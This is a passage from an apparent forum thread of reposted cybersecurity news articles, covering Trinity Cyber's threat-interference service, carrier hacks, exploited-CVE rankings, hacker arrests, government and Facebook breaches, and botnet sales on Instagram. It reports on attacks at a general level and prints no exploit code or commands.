between a hacker's command-and-control server and his or her malware, so that the malicious code mysteriously breaks. They can swap the data a hacker steals on its way out of the network, so that it appears valid but can't be read or executed. They can intercept a command sent to a malware implant, and replace it with one that tells the malware to uninstall itself, or swap a response back from the malware to the server with one that tricks the server into beaconing out its location and revealing itself. All of this is intended to foil hackers without ever giving them clear feedback about why they're failing, turning even a simple operation into a drain on time and resources. "If you’ve got a remote control that doesn’t work, you tap it, then you replace the batteries, then you bang it, then you turn the TV off and back on. But you never stop to believe there's an adversary outside the window interfering with the beam between the remote and TV," says Ryan, who left the NSA two years ago to start work on Trinity before recruiting Bossert six months ago. "If you understand the methods and what makes them successful, you can quite literally reach in and make it not only unsuccessful, but make it even advantage the security team." That sort of deception and manipulation, the Trinity founders argue, is an opportunity to upend the economics of both criminal and state-sponsored hacking: Intruders can simply try one intrusion method after another until they find one that works, with little penalty for those that don't. But if every intrusion attempt ends in frustration, the offensive advantage in cybersecurity might be blunted, says Trinity president Sciarrone. "When you turn the problem around and focus on the adversaries instead of all the points in your network, the math works for you a little better," she says. As aggressive as Trinity's tactics might sound, its founders take pains to argue it's not the sort of "active defense" long associated with the even more hawkish practice of hacking back, widely considered too reckless for private sector companies. If you counterattack a hacker's infrastructure to send a message, or to delete a copy of your stolen data, you may well incur a more focused retaliatory attack—not to mention charges under the Computer Fraud and Abuse Act. Even as Congress has reintroduced a bill that would legalize hacking back, cybersecurity experts have warned that it would have disastrous consequences, including collateral damage and a cycle of escalation that costs companies at least as much as the hackers they battle. Bossert frames Trinity's approach not as counterattacking, but as running stealthy deception and sabotage operations against intruders on the victim's turf. "We don’t need to hack back," says Bossert. "We don’t need to hack the attacker. We need to hack their hack." An Invisible Hand Even so, Trinity's tactics are sure to generate criticisms of their own—starting with questions of whether it can live up to its founders' claims. Cleverly interfering with one hacker group's operation represents a very different technical challenge from performing that same interference automatically for thousands of attacks a day across a massive enterprise network. In many cases, hackers' command-and-control communications are end-to-end encrypted, which would likely stymy at least some of Trinity's tricks. And in others, hackers may shrug off their frustration or adapt, particularly if they're going after a high value target. "My sense is that it’s harder to do than you think. The adversaries are always going to be learning. We can engage them and try to disrupt them, but they work around the damage," says Jay Healey, a senior research scholar at Columbia University's School for International and Public Affairs focused on cyberconflict. Even worse, Healey warns, would be if the enemy hackers were to detect Trinity's active threat interference, which could lead to the same sort of escalation as hacking back would have. "If you disrupt back, as a company, can you disrupt back enough that you’re too hard a target and the attackers go somewhere else? Or do they decide this is a fight they want to engage in?" Healey asks. "You can get emotions going. It's a status challenge, it’s anger, and it might be seen as escalatory." For that reason, Trinity's Ryan argues, the company will take pains to do its work invisibly. It will never reveal its customers, or the exact details of its capabilities, he says. And its operations will be carefully designed to hide their interference from the hackers it targets. "We’re never going to send a message back that says, 'Fuck you, try again,'" says Ryan. "In the best case, you want to shape things enough where the real server is responding back with a real answer that the adversary interprets as, 'Shit, it didn’t work.’” Trinity in some sense represents an extension of Bossert's approach in the White House. Trinity's cofounders refused to describe some details of the company's technical setup, but they hint that it will avoid detection in part by keeping its hardware entirely off the customer's network, so that even an intruder who breaches a victim network won't be able to find evidence of Trinity's interference or worse, compromise Trinity's machines themselves. Instead, the company will proxy all of the customer's traffic through an external data center—a rare move among security services, and one that will require its customers to put significant trust in the company as it essentially inspects all of their communications. Bossert admits that Trinity's services require a degree of interception that most companies would never accept from a government agency. "In the American set of values, the government should not do this," Bossert says. "This needed to be a commercial entity." But Trinity also hints that the service it's selling has been used by the federal government for years in some form, though only to protect Department of Defense computers. Ryan's bio on the Trinity website credits him as having "invented Proactive Threat Interference®, the approach used to reduce the risk of cyber threats to the nation’s military networks." (Whatever form this took, of course, it doesn't seem to have prevented the Pentagon from suffering periodic significant data breaches.) Ryan declined to offer more details, but Bossert adds elliptically that, "we’re going to make this better and commercially available for the first time." A Middle Path When Trump appointed Bossert as homeland security advisor in early 2017, former White House security officials from previous administrations described him as "level-headed" and "reasoned," an outlier in an administration populated with extremists, former lobbyists, and neophytes. And Trinity in some sense represents an extension of Bossert's approach in the White House: a focus on punishing adversaries rather than merely defending victims. Bossert led efforts, for instance, to call out the North Korean government hackers responsible for unleashing the WannaCry ransomware worm in May of 2017, and the Russian military hackers who released the destructive NotPetya worm a month later. The White House imposed new sanctions on Russia in response to the NotPetya attack as well as intrusions into the US electrical grid, and the Department of Justice eventually charged one North Korean hacker with criminal hacking related to WannaCry. "My premise coming in, which I maintained through my entire time there, was to be aggressive, active about attribution," Bossert says of his tenure in the executive branch. "It isn’t for the sake of knowledge alone. It’s for the sake of punitive action when you’ve determined a culprit." When John Bolton took over as national security advisor in April 2018, another round in the Trump administration's ongoing game of musical chairs, Bossert resigned after a little over a year on the job. Despite his punitive focus on adversaries, he's since criticized National Security Advisor John Bolton's apparent appetite for more aggressive cyberoffense. With Trinity, Bossert says he sees an opportunity to continue what he describes as a middle path that threads between passive defense and bellicose retaliation. He also just might get rich in the process. "I didn’t leave the White House mad, but I left before I was able to fulfill the mission I wanted to fulfill," Bossert says. "There’s no reason why, in this great country, I can’t go out and do it the old fashioned way: for profit." Source
  15. Hackers hit over a dozen mobile carriers and could shut down networks, researchers find “Hacking a company that has mountains of data that is always updating is the holy grail for an intelligence agency.” Security researchers found that hackers had infiltrated more than a dozen mobile carriers since 2012. James Martin/CNET Hackers have quietly infiltrated more than a dozen mobile carriers around the world, gaining complete control of networks behind the companies' backs. The attackers have been using it over the last seven years to steal sensitive data, but have so much control, they could shut down communications at a moment's notice, according to Cybereason, a security company based in Boston. Security researchers from the company on Tuesday said they've been investigating the campaign it's named Operation Softcell, where hackers targeted phone providers in Europe, Asia, Africa and the Middle East. The hackers infected multiple mobile carriers since 2012, gaining control and siphoning off hundreds of gigabytes of data on people. It marks a potentially massive breach -- with more fallout still to come -- as companies across different industries struggle with how to protect their customers' data. The hackers also had high-privileged access to do more than steal information. "They have all the usernames and passwords, and created a bunch of domain privileges for themselves, with more than one user," said Amit Serper, Cybereason's head of security research. "They can do whatever they want. Since they have such access, they could shut down the network tomorrow if they wanted to." Gigabytes of data theft Cyberattacks on infrastructure are a national security concern, as hackers have found ways to shut down electrical power gridsand access water dams. The US Department of Homeland Security has created its own center for dealing with attacks on infrastructure, which it acknowledged was a frequent target for hackers. If an attacker shut down phone networks, it could cause massive disruption and communication issues. Serper said he didn't find any US mobile carriers that were affected, but the hacking campaign is ongoing and it's possible that could change. While they were able to disrupt network signals, the hackers were more focused on espionage than disruption, Cybereason found. The hackers stole hundreds of gigabytes of call data records, which included sensitive information like real-time geolocation. Cybereason After gaining access to mobile carriers' internal servers, the hackers would have access to call data records on hundreds of millions of customers. That would provide information like geolocation data, call logs and text message records. While the hackers had access to millions of people's data, they had only stolen data from less than 100 highly targeted victims. The attackers likely targeted high-profile victims involved in government and the military, said Mor Levi, Cybereason's vice president of security practices. That data could update in real time, as long as mobile carriers didn't catch on that they had been hacked. "Hacking a company that has mountains of data that is always updating is the holy grail for an intelligence agency," Serper said. "It's not just about gaining that access; it's about maintaining it." How the attacks happened Cybereason's researchers found that the attackers gained access to more than a dozen mobile carriers by exploiting old vulnerabilities, like malware hidden in a Microsoft Word file or finding an exposed public server belonging to the company. Once they slipped in, the malware then spreads by searching for all the computers on the same network and attempting to gain access by flooding them with login attempts. It continues to spread as long as the credentials work, until the hackers reach the caller data records database. Using that access, the hackers also created accounts for themselves with escalated privileges, essentially hiding among the company's actual staff. Even if the companies take measures to close up its vulnerabilities, the hackers could still remain in the network for years after the fix. Because the attack method was this sophisticated and targeted, Cybereason researchers believe the hackers were backed by a nation-state. All digital forensics signs point to China -- the malware used, the method of attack and the servers the attacks are on are tied to APT10, China's elite hacking group. But there's no smoking gun tying the nation-state's hackers to this hacking campaign. Despite the hackers using Chinese malware and servers, it's possible the attacker is a group attempting to frame APT10, researchers said. "Because the tools that we saw were leaked and are publicly available to anyone who's looking to get those tools, it could be anyone who wants to look like APT10," Levi said. What to do Cybereason said it's reached out to all the affected mobile carriers, though it's unclear what fixes they may have implemented to stop the intrusion. Levi recommended that all mobile carriers strictly monitor their internet-facing properties, especially servers. Mobile carriers should also look for accounts that have high privilege access. Serper said the investigation is on-going, and he continues to find more companies hacked by this group by the day. The hackers' servers are still up and running, he noted. For people being tracked through this data theft, there's almost nothing they can do to protect themselves from espionage, he noted. Victims wouldn't even be able to know that their call data records are being stolen from mobile carriers. "There is no residue on your phone. They know exactly where you are and who you're talking to, and they didn't install any piece of code on your phone," Serper said. Source
  16. Traffic analysis sheds light on weekday habits of attackers such as the most likely day for attacks and how malicious infrastructure is shared. Do threat actors carry out phases of their attack on different days of the week? Do threats use the same infrastructure for exploitation and control? These may not be the sort of questions that cybersecurity professional usually think about, but their implications can actually have an important impact of how to better align resources and strategies to detect and defend against attacks. For the Q1 2019 Threat Landscape Report, threat analysts at FortiGuard Labs were given leeway to roam across the threat landscape they work with daily and share some stories of interest from their cyber threat data that did not necessarily relate to the primary topics or flow of the main report. This quarter, they chose to dig into data from the company’s web filtering service. Here is what they found. What and Why Weekdays vs weekends. Researchers wanted to see if threat actors conduct phases of their attacks on different days of the week to further demonstrate that cybercriminals are always looking to maximize opportunities. When they compared web-filtering volume from two Cyber Kill Chain phases during weekdays and weekends, they discovered that pre-compromise activity is roughly three times more likely to occur during the work week. This is largely due to the fact that pre-compromise activity requires someone to click on a phishing email or perform some other action, whereas post-compromise activities that rely on command-control services do not have this requirement and can occur anytime. Cybercriminals understand this, work to maximize opportunity during the week when Internet activity is taking place. The web filtering service blocks and then logs attempts to access malicious, hacked, or inappropriate websites. Analysts have applied various categorizations to this activity, like the type of website being sought and the phase of the Cyber Kill Chain in which it occurs. The overwhelming majority of blocks in Q1 occurred in the exploit (initial attack) and control (manipulation of data) phases. This stands to reason, given that devices visiting these malicious URLs are often directed there (e.g. via phishing) for the purpose of exploitation and/or for ongoing command-and-control instructions after successful exploitation. In the figure below, the contrast is clear between pre- and post-compromise activity over the quarter. The blue dots signify weekdays and orange dots weekends. Every bit of knowledge that can be gained on how attackers work offers at least some improvement over the baseline. In this case, it may make sense to consider differentiating weekday and weekend filtering practices and in prioritizing threat discovery activities. Shared infrastructure. An additional aspect of the web filtering data that researchers found worthy of attention was the degree to which different threats shared infrastructure (namely, URLs). The figure below displays this overlapping infrastructure in a circular network diagram. Each node represents malware or botnet communication activity generated by threats during the control stages of the Kill Chain. The thickness of lines represents the number of domains shared between threats at each stage. The size of each node corresponds to the total volume detected in Q1. This data fuels several interesting observations. For instance, some threats appear to leverage this community-use infrastructure to a greater degree than unique or dedicated infrastructure. In fact, nearly 60% of all analyzed threats shared infrastructure. IcedID, the #9 threat by volume in the web filter data this quarter, offers a good example of this “why buy/build when you can borrow” behavior. Like so many others, it shared nearly two-thirds of the domains it contacted with other threats. Finally, and perhaps most intriguing: when threats share infrastructure, they also tend to do so within the same stage in the Kill Chain. Similarly, while many different threats may share the same domain during the exploitation phase of an attack, it would be unusual for that threat to leverage a domain for exploitation and then later leverage it for C2 traffic. Security Tactics for People, Processes and Technology Attack vectors, like the ones just discussed, underscore the need for organizations to rethink their strategy to better future-proof and manage cyber risks. An important first step involves treating cybersecurity more like a science – doing the fundamentals really well – and then implementing an intentional layered strategy that uniquely covers all aspects of the network. As IT teams seek to create a layered security environment, there are several tactics they should consider: People – Training makes the difference between employees being an organization’s critical front-line cybersecurity asset or its greatest liability. Employees need to be trained in basic cyber hygiene practices like creating strong passwords, not reusing or sharing those passwords, identifying illicit urls and email sources, and not clicking links in emails from unknown senders. IT teams can also improve cybersecurity at the employee level with access management policies, such as the implementing the principle of least privilege. Processes – IT security teams should have a cyber incident response plan in place. They should also not only ensure that proper backups are taking place and being stored off-network, but that those backups are regularly being tested. The collection, analysis, and sharing of threat research across teams, devices, and network environments is also critically imperative. Finally, IT teams must know what assets are online, where those assets are, and then be able to prioritize their access to and consumption of resources based on which are most business-critical. Technology – It’s important for IT teams to not implement isolated point solutions as they layer their defenses, but instead choose tools based on their ability to be integrated and automated so they can share real-time threat intelligence. This integrated approach creates a comprehensive solution that can facilitate rapid detection and mitigation of threats across the entire distributed network. Deception technology is another tactic IT teams should make use of. Effective deception strategies make it harder for an adversary to determine which assets are fake and which are real, while tripwires embedded in these false signals increase the ability to detect an intruder. Finally, segmenting corporate networks limits exposure of critical data if there is a breach. Adapting Security Strategy Last quarter offered insight into how attackers are currently operating and how they continue to evolve. For example, different stages of their attacks occur on different days, and they tend to share infrastructure. In response, IT security teams can be on the lookout for these activity identifiers and adjust their detection and filtering practices accordingly. It is also clear that building a layered defense approach that factors in people, processes, and technology will minimize the impact of such attacks, even as they continue to evolve. Source
  17. I have said it before, and I will say it again — Smart devices are one of the dumbest technologies, so far, when it comes to protecting users' privacy and security. As more and more smart devices are being sold worldwide, consumers should be aware of security and privacy risks associated with the so-called intelligent devices. When it comes to internet-connected devices, smart TVs are the ones that have highly-evolved, giving consumers a lot of options to enjoy streaming, browsing the Internet, gaming, and saving files on the Cloud—technically allowing you to do everything on it as a full-fledged PC. Apparently, in the past few years we have reported how Smart TVs can be used to spy on end users without their explicit consent, how remote hackers can even take full control over a majority of Smart TVs without having any physical access to them, and how flaws in Smart TVs allowed hackers to hijack TV screen. Now most recently, Smart TVs selling under SUPRA brand-name have been found vulnerable to an unpatched remote file inclusion vulnerability that could allow WiFi attackers to broadcast fake videos to the television screen without any authentication with the television. SUPRA is a lesser-known Russia electronics brand on the Internet that manufactures several affordable audio-video equipments, household appliances and car electronics, most of which are being distributed through Russian, Chinese, Russian and UAE-based e-commerce websites. Discovered by Dhiraj Mishra and shared with The Hacker News, the vulnerability (CVE-2019-12477) resides in the "openLiveURL" function of the Supra Smart Cloud TV due to lack of authentication or session management. As shown in the PoC URL, the vulnerability could allow a local attacker to inject a remote file in the broadcast and display fake videos without any authentication. As demonstrated by Dhiraj, the exploit allowed him to broadcast a fake "Emergency Alert" while the TV was playing a speech of Steve Jobs—by simply injecting the video file through the PoC URL using his web browser. Though the requirement of having attackers' access to victim's WiFi network by default limits the threat to a great extent, a growing number of router and IoT vulnerabilities still makes it a potential attack scenario for remote attackers. Though the vulnerability has been given a CVE ID, it is unlikely to be patched. So, users who own a Supra Smart Cloud TV can't do more than keeping their WiFi network secure—like setting a strong password, avoid sharing WiFi password with untrusted people and keeping other so-called smart devices behind a firewall or off the Internet that are connected to the same network. Source
  18. According to Sophos Senior Security Advisor John Shier, organisations are struggling with phishing and other user-focused attacks in India. NEW DELHI: With more and more Indians going online and generating never-heard-before kind of data, hackers have turned their focus on a country with over 450 million smartphone users and more than 550 million Internet users. The country has 366 million Internet subscribers in urban locations and 194 million in rural areas, says the latest report by Telecom Regulatory Authority of India (TRAI). According to Sophos Senior Security Advisor John Shier, organisations are struggling with phishing and other user-focused attacks in India. "Most people don't believe that computer-based training (CBT) is effective and are looking for ways to improve their defenses against users being tricked into inviting malicious attackers into their network," Shier said in a statement. A KPMG report in April revealed that nearly 86 per cent of the consumers in India are concerned about eavesdropping of their conversations or theft or misuse of their messages through their devices. "The proliferation of connected and IoT devices will have a cross-sector impact on areas around data security and privacy. In response to this, regulators will need to establish mandatory data security requirements," said Atul Gupta, Leader-IT Advisory and Cyber Security Leader, KPMG in India. Around 87 per cent of the consumers are concerned that retailers will misuse or improperly distribute their information. According to Gauri Bajaj, Director, Cybersecurity (APAC), Tata Communications, the adoption of cyber security remains a key challenge. "The recent spate of cyber attacks only highlight the security risk that takes place both within and without the organisation. It is imperative that employees are sensitised to the risk of security breaches and trained to respond in such a scenario," Bajaj said. Not just phones, wearable devices like smartwatches are the next frontier for cyber security. "The future of wearable tech in the world of AI and predictive technology will be highly individualized, data driven and analytics intensive. One of the bigger applications of this will continue to be in the healthcare and fitness sector. "However, what is key to make this happen is also building a holistic ecosystem that tracks, guides and designs individualized plans for each individual, at a low cost," said Vishal Gondal, CEO and founder GOQii. It isn't enough to have an IT security team and having a strong culture around security is the next step in maturity for security awareness programmes, say experts. "Use a unique, complex password for banking and other financial online accounts. For others, use a password manager to keep them organised and readily available. Use Two-Factor Authentication (2FA) when available to provide an extra layer of security on accounts," Shier said. Be wary of clicking on emails from unknown sources or deals that look too good to be true. Cyber criminals use look-alike spam to lure in victims with links to bogus websites. Businesses should train employees on how to "spot a phish". "Use a layered business security strategy to provide protection at multiple levels to avoid attacks from different angles. Be wary of IoT devices on any network. Change factory default passwords immediately out of the box," the Sophos executive added. Source
  19. These are the top ten security vulnerabilities most exploited by hackers But one simple thing could help stop the vast majority of these attacks, say researchers. Security vulnerabilities in Microsoft software have become an even more popular means of attack by cyber criminals - but an Adobe Flash vulnerability still ranks as the second most used exploit by hacking groups. Analysis by researchers at Recorded Future of exploit kits, phishing attacks and trojan malware campaigns deployed during 2018 found that flaws in Microsoft products were the most consistently targeted during the course of the year, accounting for eight of the top ten vulnerabilities. That figure is up from seven during the previous year. Patches are available for all the flaws on the list - but not all users get around to applying them, leaving themselves vulnerable. Microsoft is the most common target, likely thanks to how widespread use of its software is. The top exploited vulnerability on the list is CVE-2018-8174. Nicknamed Double Kill, it's a remote code execution flaw residing in Windows VBSsript which can be exploited through Internet Explorer. Double Kill was included in four of the most potent exploit kits available to cyber criminals – RIG, Fallout, KaiXin and Magnitude – and they helped deliver some of the most notorious forms of banking trojan and ransomware to unsuspecting victims. But the second most commonly observed vulnerability during the course of the year was one of only two which didn't target Microsoft software: CVE-2018-4878 is an Adobe Flash zero-day first identified in February last year. An emergency patch was released within hours, but large numbers of users didn't apply it, leaving them open to attacks. CVE-2018-4878 has since been included in multiple exploit kits, most notably the Fallout Exploit Kit which is used to power GandCrab ransomware – the ransomware remains prolific to this day. Adobe exploits used to be the most commonly deployed vulnerabilities by cyber criminals, but they appear to be going off it as we get closer to 2020. Third in the most commonly exploited vulnerability list is CVE-2017-11882. Disclosed in December 2016, it's a security vulnerability in Microsoft Office which enables arbitrary code to run when a maliciously-modified file is opened – putting users at risk malware being dropped onto their computer. The vulnerability has come to be associated with a number of malicious campaigns including the QuasarRAT trojan, the prolific Andromeda botnet and more. Only a handful of vulnerabilities remain in the top ten on a year on year basis. CVE-2017-0199 – a Microsoft Office vulnerability which can be exploited to take control of an affected system – was the most commonly deployed exploit by cyber criminals in 2017, but slipped to the fifth most in 2018. CVE-2016-0189 was the ranked vulnerability of 2016 and second ranked of 2017 and still features among the most commonly exploited exploits. The Internet Explorer zero-day is still going strong almost three years after it first emerged, suggesting there's a real issue with users not applying updates to their browsers. Applying the appropriate patches to operating systems and applications can go a long way to protecting organisations against of some the most commonly deployed cyber attacks, as can having some intelligence on the potential risks posed by cyber attackers. "The biggest take-away is the importance of having insight into vulnerabilities actively sold and exploited on underground and dark web forums," Kathleen Kuczma, sales engineer at Recorded Future told ZDNet. "Although the ideal situation would be to patch everything, having an accurate picture of which vulnerabilities are impacting a company's most critical systems, paired with which vulnerabilities are actively exploited or in development, allows vulnerability management teams to better prioritize the most important places to patch," she added. The only non-Microsoft vulnerability in the list aside from the Adobe vulnerability is CVE-2015-1805: a Linux kernel vulnerability which is often used to attack Android smartphones with malware. The top ten most commonly exploited vulnerabilities – and the software they target – according to the Recorded Future Annual Vulnerability report are: CVE-2018-8174 – Microsoft CVE-2018-4878 – Adobe CVE-2017-11882 – Microsoft CVE-2017-8750 – Microsoft CVE-2017-0199 – Microsoft CVE-2016-0189 – Microsoft CVE-2017-8570 – Microsoft CVE-2018-8373 – Microsoft CVE-2012-0158 – Microsoft CVE-2015-1805 – Google Android Source
  20. Ukrainian Police have this week busted out two separate groups of hackers involved in carrying out DDoS attacks against news agencies and stealing money from Ukrainian citizens, respectively. According to the authorities, the four suspected hackers they arrested last week, all aged from 26 to 30 years, stole more than 5 million Hryvnia (around 178,380 USD) from the bank accounts of Ukrainian citizens by hacking into their computers. The suspects carried out their attacks by scanning vulnerable computers on the Internet and infecting them with a custom Trojan malware to take full remote control of the systems. The group then apparently enabled key-logging on the infected computers in an attempt to capture banking credentials of victims when the owners of those infected computers fill in that information on any banking site or their digital currency wallet. Once getting a hold on the victims banking and financial data, the attackers logged into their online banking accounts and transferred the funds or cryptocurrencies to the accounts controlled by the attackers. Besides stealing money, the suspects also left the backdoor on the victims' computers for further control, so that they can use them in the future for carrying out other illicit activities. Criminal proceedings against all the four people have been initiated under several articles of the Criminal Code of Ukraine, including theft and unauthorized interference with the work of computers, automated systems, computer networks or telecommunication networks. Two Ukrainian DDoS Hackers Arrested In a separate press release, Police today announced the arrest of two other hackers, 21- and 22-years-old, suspected of performing DDoS attacks against several critical Ukrainian resources, including news sites of the city of Mariupol and several state educational institutions. According to the authorities, the duo developed two DDoS hacking tools which they used to send hundreds of automatic queries to their targeted regional information resources every second, eventually making their service unavailable. The pair is currently facing up to six years in prison under article 361 of the Criminal Code of Ukraine, which includes unlawful interference with the work of computers, automated systems, computer networks or telecommunication networks. Source
  21. Government says hackers breached 30 computers and stole data from 10. Hackers have breached the computer systems of a South Korean government agency that oversees weapons and munitions acquisitions for the country's military forces. The hack took place in October 2018. Local press reported this week[1, 2, 3] that hackers breached 30 computers and stole internal documents from at least ten. The breached organization is South Korea's Defense Acquisition Program Administration (DAPA), an agency part of the Ministry of National Defense. It is believed that the stolen documents contain information about arms procurement for the country's next-generation fighter aircraft, according to a news outlet reporting on the cyber-attack. Reports claim that hackers gained access to the server of a security program installed on all government computers. Named "Data Storage Prevention Solution," the app is installed on South Korean government computers to prevent sensitive documents from being downloaded and saved on internet-connected PCs. According to reports, hackers gained admin access to the software's server and used it to siphon documents from connected workstations. The country's intelligence agency (NIS, National Intelligence Service) investigated the breach in November and reported its findings to government officials, who disclosed the cyber-attack to the public this week. Government officials didn't pin the blame on North Korean hackers, as they usually do, although it wouldn't surprise anyone if they did, as North Korea has often launched cyber-espionage and intelligence collection operations against its southern neighbor. For example, in October 2017, South Korea accused North Korea of hacking and stealing the South's secret joint US war plans, which included detailed plans to attack the North in case diplomatic relations deteriorated to a point where military action was needed. Source
  22. A hacker has targeted and released private data on German chancellor Angela Merkel and other senior German lawmakers and officials. The data was leaked from a Twitter account, since suspended, and included email addresses, phone numbers, photo IDs and other personal data on hundreds of senior political figures. According to a government spokesperson, there was no “sensitive” data from the chancellor’s office, but other lawmakers had more personal data stolen. Other portions of the leaked data included Facebook and Twitter passwords. Some had their credit card information stolen, and chat logs and private letters published in the breach. Germany’s Federal Office for Information Security said in a statement that it was “extensively investigating” the breach, but does not believe there was an attack on the government’s networks. It’s been reported that the hacker may have obtained passwords to access social media accounts. Often, hackers do this by tricking a phone company into “porting out” a person’s phone number to another SIM card, allowing them to password reset accounts or obtain two-factor codes. The hacker leaked data on senior lawmakers across the political spectrum, but noticeably absent were accounts for the country’s far-right Alternative for Germany party. The hack is reminiscent of a data breach involving the Democratic National Committee in 2016, which targeted the Democrats in the U.S. in the months running up to the U.S. presidential election. The U.S. government later attributed the hack to Russia, which prosecutors say tried to influence the election to elect Donald Trump to the White House. The Justice Department brought charges against seven suspects earlier this year for being part of the so-called “Fancy Bear” group of hackers, working on behalf of the Russian government. Little is known about who is behind the leak of German lawmakers’ data. The German government has not speculated about who — or if a nation state — may have been behind the attack. But the alleged hacker said in a statement linked from their Twitter account that they “operated alone and does not belong to any organization or similar on Twitter.” According to security experts who’ve seen portions of the data, the hacker spread the stolen information across several sites and mirrors, making it “really hard to take down.” This data leak has so much data squirrelled away to avoid take downs. It must have required many man hours of uploading. – 70 mirrors of the download links – 40 d/l links, each with 3-5 mirrors – 161 mirrors of data files Plus the tweets, blog posts, mirrors of mirror links. — the grugq (@thegrugq) January 4, 2019 Germany’s minister for justice Katarina Barley called the breach a “serious attack,” one that aimed to “damage confidence in our democracy and institutions,” according to the BBC. It’s not the first time that the German parliament has faced security issues. In 2015, attackers stole gigabytes of data on lawmakers, which Germany’s domestic spy agency later accused Russia of being behind the breach. Russia has repeatedly denied launching cyberattacks. Source
  23. Late last month, Facebook disclosed a massive security vulnerability that it claimed affected some 50 million login tokens, but details were somewhat thin on its impact pending further investigation. In a blog post today, the results are in some ways better and worse. The company believes its initial estimate of 50 million compromised login tokens—it reset 90 million in total as a cautionary measure—was generous, and Facebook now believes the number of accounts impacted to be closer to 30 million. That’s the good news, if you can call it that. For 400,000 of the accounts, which these attackers used to seed the process of gathering login tokens, personal information, such as “posts on their timelines, their lists of friends, Groups they are members of, and the names of recent Messenger conversations” and, in one instance, actual message content, were compromised. Of the 30 million ensnared in the attack, Facebook believes that for around half, names and contact information—meaning phone numbers, email addresses, or both—were visible to the attackers; 14 million of that pool had that same information scraped as well as myriad other personal details, which Facebook believes could contain any of the following: Facebook believes only 1 million of the total compromised accounts had no personal information accessed whatsoever. Beginning with a set of accounts controlled by the attackers, the exploit jumped from friends of those users to friends of friends, ballooning to the eventual total of 30 million accounts via an automated script. Facebook reaffirmed that third-party apps were not accessed using the stolen tokens, and that the vulnerability did not affect other services the company owns, like WhatsApp or Instagram. The vulnerability had existed in Facebook’s code since July of 2017, and resulted in “an unusual spike of activity” September 14 of this year. It would be almost two weeks before the activity was determined to be a legitimate attack, and to have the exploit patched. Facebook is working alongside the FBI, and according to remarks by Vice President of Product Management Guy Rosen this afternoon, the agency’s investigation appears to be ongoing. When asked if any pattern exists among the victims or who might have been behind the attack, Facebook cited an FBI request not to disclose such information. Rosen did state the company does not believe the attack was directly related to the upcoming U.S. midterm elections. According to Rosen, a tool in Facebook’s help center will now show users if they were affected and what information may have been exposed. Users will also see a “customized message” in the coming days to assist in preventative measures. Source
  24. As hacking and gaming communities continue to intersect, some hackers are selling access to botnets and likely stolen Fortnite, Spotify, and other online accounts on Instagram. Instagram isn’t only for exotic travel, pet, or food photos. Communities of hackers are also using the social network to sell stolen Spotify and Fortnite accounts, as well as access to botnets designed to launch distributed-denial-of-service (DDoS) attacks. The accounts highlight social media companies’ continuing issues with content moderation. In this case, Facebook, which owns Instagram, is having trouble preventing illegal content from being distributed on its platforms. In particular, some people on Instagram are advertising botnets they claim to be associated with Mirai, a network of internet of things-based devices that have been repurposed to attack websites and servers by spamming them with traffic. Some are selling botnets based on other code. “There is a lot of people in the community on Instagram,” Root Senpai, who sells various hacking-related goods on Instagram, told Motherboard in a message on Discord, a messaging platform popular among gamers. Caption: A screenshot of one of the Instagram posts advertising a botnet. Image: Instagram Screenshot The hackers themselves and their wares appear to be unsophisticated. One Instagram post, which includes an apparent photo of the hacker’s screen, claims to be selling access to a Mirai-based botnet, likely for attacking websites or other online services to try and slow them to a crawl. Several other users Motherboard found are selling access to other botnets, with one post advertising subscription-style plans for $5 to $80 a month (it is not immediately clear how powerful, or lackluster, these particular botnets may be.) When asked how they obtained this botnet, perhaps by hacking into computers themselves, Root Senpai declined to elaborate for “security reasons,” they said. Another account, using the name ghostttzzz, includes a screenshot of their botnet control panel, with the text “hmu [hit me up] for spots.” Some of the hackers are advertising these tools in normal Instagram posts, others are advertising them using the network’s Stories feature. Stolen accounts do generate interest from customers, “especially Fortnite accounts,” Root Senpai added. As the game skyrocketed in popularity, hackers have continually cracked into Fortnite accounts to sell, some of which come with rare character skins. As Kotaku reported in March, some hackers break into accounts to use the victim’s payment information to buy game upgrades, and then transfer them to other accounts. Indeed, much of the activity from the Instagram hacker accounts overlaps with gaming communities. Some accounts, as well as posting photos of their botnet control screens, share images from Fortnite or other online games. Some of the hackers appear to be young; Root Senpai said that “there are a lot of kids on Instagram that is [sic] willing to buy botnet spots, mostly kids that play on console.” “For me I just sell spots for fun and money because I am still to [sic] young to get a full job that can make a decent amount of money,” they added. Finding various accounts selling access to botnets and stolen accounts was fairly trivial. Many of them follow each other, making some form of hacker community on the platform. The scale of the issue is unclear, however: Motherboard focused on one particular collection of accounts that appear to interact with and follow each other. Root Senpai did describe people in the trade of these botnets and accounts as the “ig community.” Caption: A screenshot of one of the Instagram posts advertising Fortnite accounts. Image: Instagram Screenshot Instagram’s terms of service says users cannot “do anything unlawful, misleading, or fraudulent or for an illegal or unauthorized purpose.” That, an Instagram spokesperson confirmed to Motherboard, includes selling access to hacked computers or accounts. The spokesperson added that Instagram is investigating the issue and will take steps to remove content violating its terms. Motherboard did not share specific account names with Instagram. As we’ve argued before, it is not journalists’ job to act as content moderators for some of the world’s most powerful technology companies. Motherboard did share redacted screenshots with Instagram so it could see the sort of posts being shared by the hackers and provide a response. Instagram has to deal with all sorts of offensive or illegal content on its platform. Internal Instagram documents previously obtained by Motherboard showed some of the company’s enforcement strategies and policies for combating such content. “These are high intensity, prevalent abuse types that have led to PR fires on Instagram,” one of the documents for training moderators obtained by Motherboard reads, referring to terrorism and drug sales on its platform. At the time of writing, all of the accounts Motherboard found selling stolen accounts or access to botnets are still online. Source
×
×
  • Create New...